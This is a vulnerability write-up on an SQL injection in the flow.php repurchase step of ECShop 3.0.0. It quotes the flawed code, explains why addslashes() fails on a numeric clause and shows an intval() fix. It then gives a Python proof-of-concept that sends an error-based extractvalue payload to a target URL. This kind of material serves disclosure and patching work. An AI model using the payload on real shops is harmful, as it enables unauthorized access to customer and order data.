Bugscan reported this vulnerability, and I reproduced it.
flow.php in the web root is vulnerable to SQL injection.
elseif ($_REQUEST['step'] == 'repurchase')
{
    include_once('includes/cls_json.php');

    $order_id = strip_tags($_POST['order_id']);
    $order_id = json_str_iconv($order_id);

    $db->query('DELETE FROM ' . $ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE);

    $order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);

    $result = array('error' => 0, 'message' => '');
    $json = new JSON;

    foreach ($order_goods as $goods)
    {
        $spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);
        if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE))
        {
            $result = false;
            $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
        }
    }

    die($json->encode($result));
}
Look at these two lines:
$order_id = strip_tags($_POST['order_id']);
$order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);
order_id receives no filtering beyond strip_tags().
Single quotes are escaped by addslashes(), but look at the query carefully:
$order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);
order_id is concatenated into a numeric comparison, so no single quote is needed to inject.
Direct injection
The injection was successful.
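The fix that follows from the analysis above, as an added example (not ECShop's own code): a numeric column needs an integer cast, because addslashes() only touches quotes and backslashes. The table name "ecs_order_goods" and the sample inputs are constructed for the demonstration.

```php
<?php
// Added example, not ECShop's code. Shows why addslashes() does not protect the
// numeric WHERE clause in flow.php and how intval() closes the hole.
// The table name "ecs_order_goods" and the inputs below are constructed for the demo.

// Mirrors the vulnerable flow.php pattern: strip_tags() then string concatenation.
// addslashes() stands in for the quote escaping the post mentions.
function build_query_vulnerable($order_id)
{
    $order_id = addslashes(strip_tags($order_id));
    return "SELECT goods_id, goods_number, goods_attr_id, parent_id "
         . "FROM ecs_order_goods WHERE order_id = " . $order_id;
}

// Hardened: order_id is an integer column, so cast before it reaches the SQL string.
// intval() keeps only the leading digits of the input (or yields 0).
function build_query_fixed($order_id)
{
    $order_id = intval($order_id);
    return "SELECT goods_id, goods_number, goods_attr_id, parent_id "
         . "FROM ecs_order_goods WHERE order_id = " . $order_id;
}

// Constructed inputs: a normal id, a quoted value, and a quote-less tampered value.
$inputs = array("15", "15'", "15 OR 1=1");
foreach ($inputs as $in) {
    echo "input: {$in}\n";
    echo "  vulnerable: " . build_query_vulnerable($in) . "\n";
    echo "  fixed:      " . build_query_fixed($in) . "\n";
}
// For "15 OR 1=1" the vulnerable query keeps the OR clause intact because there is
// no quote for addslashes() to escape; the fixed query reduces it to order_id = 15.
```

The cast closes the injection; whether the order actually belongs to the logged-in user is a separate authorization check that this code does not make.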
The verification POC is given below:
# Python 2 script (raw_input / print statement), as the original was written.
import requests

def check_vulnerable(check_url):
    if check_url[-1] == '/':
        url = check_url + 'flow.php?step=repurchase'
    elif check_url[-1] != '/':
        url = check_url + '/flow.php?step=repurchase'
    post_data = {"order_id": "order_id=1 or extractvalue(1,concat(0x7e,md5(1)) or #"}
    res = requests.post(url, data=post_data)
    if res.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849' in res.text:
        return True
    else:
        return False

if __name__ == '__main__':
    check_url = raw_input("Input URL:")
    if check_vulnerable(check_url):
        print "It's vulnerable"
    else:
        print "It's not vulnerable"
By the way, here is the source package for anyone who wants to reproduce this:
Https://pan.baidu.com/s/1c1Ldye8
ECShop 3.0.0 release 0518 SQL injection